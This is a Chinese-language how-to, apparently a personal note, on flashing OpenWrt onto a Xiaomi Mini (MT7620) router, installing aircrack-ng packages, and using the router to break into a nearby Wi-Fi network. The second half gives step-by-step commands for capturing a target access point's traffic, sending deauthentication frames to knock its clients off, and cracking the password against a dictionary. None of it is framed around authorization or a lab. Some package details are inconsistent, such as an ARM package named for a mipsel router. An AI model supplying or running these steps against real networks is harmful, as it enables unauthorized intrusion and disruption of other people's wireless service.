给路由下载指定固件我的是mt7620
https://mirrors.aliyun.com/openwrt/releases/23.05.5/targets/ramips/mt7620/
initramfs-kernel.bin 更适合于紧急情况下的系统恢复或测试新的内核而不影响现有系统。
squashfs-sysupgrade.bin 是用于常规系统升级的固件,适用于日常更新和刷机操作。
我的是小米早期的mini路由下载这个
openwrt-23.05.5-ramips-mt7620-xiaomi_miwifi-mini-squashfs-sysupgrade.bin
注意自己的OpenWrt版本,上面版本不通,下面是我测试的
首先,确认你的OpenWrt设备的CPU架构。可以通过以下命令查看:
opkg print-architecture
我的路由CPU架构是mipsel_24kc
下载指定安装包
https://mirror.sjtu.edu.cn/openwrt/releases/packages-19.07/mipsel_24kc/
aircrack-ng airmon-ng 是在packages下aircrack-ng_0.9.1_arm.ipk
把文件放到U盘或上传到root目录
用shh登录 开始安装
opkg install aircrack-ng_0.9.1_arm.ipk
如果有下面的提示
- pkg_hash_check_unresolved: cannot find dependency libpcap1 for aircrack-ng
等等 系统找不到一些必要的依赖项,包括内核相关的模块(如kmod-crypto-hash等)以及库文件(如libpcap1、uclibcxx等)
比如上面错误 没有libpcap1,在https://mirror.sjtu.edu.cn/openwrt/releases/packages-19.07/mipsel_24kc/base/ 下面libpcap1_1.9.1-2.1_mipsel_24kc.ipk
跟上面操作一样 上传安装libpcap1
airmon-ng可以不安装 在wifi模式中设置监听就可以
查看目标AP所在的信道
airodump-ng wlan0
使用以下命令启动数据包捕获:
airodump-ng -c [channel] --bssid [BSSID] -w capture wlan0
其中,“[channel]”是目标网络的信道号,“[BSSID]”是目标网络的MAC地址,“capture”是保存捕获数据包的文件名。
使用以下命令对目标网络进行攻击:
aireplay-ng -0 10 -a [BSSID] wlan0mon
其中,“-0”表示进行Deauthentication攻击,“10”表示发送10个Deauthentication帧,“[BSSID]”是目标网络的MAC地址。
使用Aircrack-ng破解密码
使用以下命令运行Aircrack-ng并提供捕获的数据包和字典文件:
sudo aircrack-ng -w [dictionary-file] capture-01.cap
其中,“[dictionary-file]”是用于破解密码的字典文件名,“capture-01.cap”是捕获的数据包文件名。